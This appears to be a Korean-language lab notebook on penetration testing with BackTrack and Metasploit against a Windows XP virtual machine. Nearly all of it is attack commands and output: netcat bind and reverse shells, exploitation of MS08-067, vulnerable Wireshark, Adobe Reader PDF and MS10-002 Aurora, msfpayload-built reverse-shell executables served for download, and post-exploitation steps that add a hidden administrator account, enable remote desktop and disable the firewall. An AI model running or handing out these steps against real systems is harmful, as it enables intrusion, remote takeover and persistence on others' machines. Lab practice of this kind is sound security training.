BackTrack 사용해보기


-- 순서 --

1. BT SSH 오픈

2. BT WEB 오픈 

3. nc.exe windows 복사

4. nc 연습



1. BT SSH 오픈

- ssh 키 생성

- SSH포트(22) 확인

# sshd-generate

# ls /etc/ssh

# /etc/init.d/ssh start

# passwd 

# ifconfig eth1





Xshell 로 로그인 


2. BT WEB 오픈 

- 웹포트(80) 확인

- nc.exe 를 web root 디렉토리에 복사 

# /etc/init.d/apach2 start

# netstat -nltp 

# cp /pentest/windows-binaries/tools/nc.exe /var/www



3. nc.exe windows 복사

explorer 를 실행해서 

http://BT/nc.exe 




nc.exe 를 C:\에 저장한다


4. nc 연습

- bind shell


V : windows , A : bt



c:\> nc -l -v -p 8000



# nc 192.168.56.201 8000



c:\> nc -l -v -p 8000 -e cmd.exe

# nc 192.168.56.201 8000




- reverse shell

# nc -lvp 8000

c:\> nc 192.168.56.101 8000  -e cmd.exe






msfconsole ( 그냥 Kali에서 함 )

1. 공격모듈 선택 

2. 공격 패이로드 선택

3. 옵션 설정

4. 공격 


윈도우 XP 파일 및 프린터 공유 관련 서비스 취약점을 이용한 공격


0. 공격대상 Windows XP -> 방화벽 내려주자



그리고 네트워크 설정에서 Microsoft 네트워크용 파일 및 프린터 공유에 체크가 되어있어야 한다




1. 공격모듈 선택/옵션 설정

# msfconsole 



msf > use exploit/windows/smb/ms08_067_netapi

msf  exploit(ms08_067_netapi) > set RHOST 192.168.56.201

msf  exploit(ms08_067_netapi) > show options



2. 공격 패이로드 선택/옵션 설정

msf  exploit(ms08_067_netapi) > set payload windows/shell/reverse_tcp

msf  exploit(ms08_067_netapi) > set LHOST 192.168.56.101

LHOST => 192.168.56.101

msf  exploit(ms08_067_netapi) > show options


Module options (exploit/windows/smb/ms08_067_netapi):


   Name     Current Setting  Required  Description

   ----     ---------------  --------  -----------

   RHOST    192.168.56.201   yes       The target address

   RPORT    445              yes       Set the SMB service port

   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)



Payload options (windows/shell/reverse_tcp):


   Name      Current Setting  Required  Description

   ----      ---------------  --------  -----------

   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none

   LHOST     192.168.56.101   yes       The listen address

   LPORT     4444             yes       The listen port



Exploit target:


   Id  Name

   --  ----

   0   Automatic Targeting



3. 공격 

msf  exploit(ms08_067_netapi) > exploit 


[*] Started reverse handler on 192.168.56.101:4444 

[*] Automatically detecting the target...

[*] Fingerprint: Windows XP - Service Pack 3 - lang:Korean

[*] Selected Target: Windows XP SP3 Korean (NX)

[*] Attempting to trigger the vulnerability...

[*] Sending stage (240 bytes) to 192.168.56.201


Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.


C:\WINDOWS\system32>ipconfig

ipconfig


Windows IP Configuration



Ethernet adapter 로컬 영역 연결:


        Connection-specific DNS Suffix  . : local

        IP Address. . . . . . . . . . . . : 10.0.2.15

        Subnet Mask . . . . . . . . . . . : 255.255.255.0

        Default Gateway . . . . . . . . . : 10.0.2.2


Ethernet adapter 로컬 영역 연결 2:


        Connection-specific DNS Suffix  . : 

        IP Address. . . . . . . . . . . . : 192.168.56.201

        Subnet Mask . . . . . . . . . . . : 255.255.255.0

        Default Gateway . . . . . . . . . : 


C:\WINDOWS\system32>




(다시 백트랙에서함)


# /etc/init.d/apache2 restart

# cd /var/www

# cp /pentest/windows-binaries/tools/wget.exe .



payload를 바꾸어 파일 업르도 시킴


use exploit/windows/smb/ms08_067_netapi

set payload windows/meterpreter/reverse_tcp

set RHOST 192.168.56.201

set LHOST 192.168.56.200

exploit



meterpreter > upload /var/www/wget.exe c:\\

[*] uploading  : /var/www/wget.exe -> c:\

[*] uploaded   : /var/www/wget.exe -> c:\\wget.exe


(한글이 깨져 보이는건 인코딩 때문인데 백트랙 터미널 설정에서 인코딩을 변경해주면 한글도 제대로 볼 수 있다)



취약한 프로그램(Wireshark 취약 버전) 사용하는 Windows XP 공격


Windows XP에 설치



백트랙으로 공격


use  exploit/multi/misc/wireshark_lwres_getaddrbyname

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.56.200

set RHOST 192.168.56.201

set target 4



show options



exploit


(Windows XP에서 취약한 Wireshark를 이용하여 패킷 캡처중이어야 한다)



pdf 취약점.


1. 공격모듈 선택 

2. 공격 패이로드 선택

3. 옵션 설정

4. 공격 


Windows XP에 취약한 adobe reader가 설치 되어있어야 한다.


use exploit/windows/browser/adobe_cooltype_sing

set payload windows/meterpreter/reverse_tcp

set URIPATH test.html

set lhost 192.168.56.101

exploit



Windows XP에서 접속


http://192.168.56.101:8080/test.html



BackTrack에서 확인



sessions -l

sessions -i 1

shell

ipconfig



use exploit/windows/fileformat/adobe_cooltype_sing 

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.56.101

exploit

quit



mv ~/.msf4/local/msf.pdf /var/www


(msfconsole은 대화형이고

msfcli는 커맨드라인인터페이스형임)


msfcli exploit/multi/handler \

> PAYLOAD=windows/meterpreter/reverse_tcp \

> LHOST=192.168.56.101 E




XP에서 접속


http://192.168.56.101/msf.pdf



BackTrack에서 확인




################

## msfpayload ##

################


msfpayload -h


Usage: /opt/metasploit/msf3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar>


OPTIONS:


    -h        Help banner

    -l        List available payloads



# msfpayload windows/shell_reverse_tcp O

(옵션의 O 임)



# msfpayload windows/shell_reverse_tcp \

> LHOST=192.168.56.101 X > /var/www/malware.exe



# msfconsole

use exploit/multi/handler

set payload windows/shell_reverse_tcp 

show options

set LHOST 192.168.56.101

exploit



XP에서 접속


http://192.168.56.101/malware.exe



만든 악성 파일 다운



실행함



BackTrack에서 확인



ipconfig




이번엔 meterpreter로 만들어봄


# msfpayload windows/meterpreter/reverse_tcp O



# msfpayload windows/meterpreter/reverse_tcp \

> LHOST=192.168.56.101  X > /var/www/malware2.exe



# ls -l /var/www/malware2.exe 

-rw-r--r-- 1 root root 73802 2014-06-20 06:54 /var/www/malware2.exe

# file /var/www/malware2.exe 

/var/www/malware2.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

# msfconsole 



use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.56.101

exploit



XP에서 접속


http://192.168.56.101/malware2.exe



저장



실행



백트랙에서 확인


shell

ipconfig






참고 : MS10-002 취약점


use exploit/windows/browser/ms10_002_aurora

set payload windows/meterpreter/reverse_tcp

set URIPATH test.html

set lhost 192.168.56.101

exploit



XP에서 접속


http://192.168.56.101:8080/test.html



sessions -l

sessions -i 1



ps



migrate 1160


shell



net user test test1234 /add

net localgroup administrators test /add

exit



run getgui -e -f 8090



(putty나 xshell로 원격 접속 중에는 안된다

백트랙 콘솔창에서 실행하자)


터미널 창을 하나 더 열어서


rdesktop localhost:8090





이런 Reverse / Bind 악성 코드와 루트킷은


Iceword, gmer 로 탐지한다.


cmd 명령어 중 방화벽 사용 중지 하고


방화벽 룰을 추가하는 명령어


netsh firewall set opmode disable(enable)

netsh firewall set portopening TCP 3500 "NATE oN"